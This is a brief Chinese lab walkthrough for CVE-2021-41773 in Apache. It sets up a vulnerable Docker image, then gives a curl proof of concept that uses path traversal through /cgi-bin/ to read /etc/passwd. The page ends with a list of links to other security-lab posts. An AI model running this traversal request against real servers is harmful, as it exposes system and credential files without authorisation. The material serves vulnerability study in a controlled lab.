1.环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d
2.使用poc
curl http://192.16.10.190:8080/cgi-bin/../../../../etc/passwd
3.工具验证
相关推荐
YoungLime6 小时前
DVWA靶场之十:DOM 型 XSS(DOM Based Cross Site Scripting (XSS))mooyuan天天9 小时前
CTFHub 信息泄露通关笔记10:SVN泄露(2种方法)YoungLime21 小时前
DVWA靶场之十三:CSP 绕过(Content Security Policy (CSP) Bypass)YoungLime1 天前
DVWA靶场之一:暴力破解(Brute Force)YoungLime1 天前
DVWA靶场之三:跨站请求伪造(CSRF)YoungLime2 天前
DVWA靶场之十二:储存型 XSS(Stored Cross Site Scripting (XSS))galaxylove2 天前
Gartner发布网络弹性指南:将业务影响评估(BIA)嵌入网络弹性策略的核心,重点保护基础设施和关键业务系统介一安全2 天前
【Web安全】转义字符注入?转义也会失效的SQL注入余防2 天前
代码审计盛满暮色 风止何安2 天前
网络安全设备 防火墙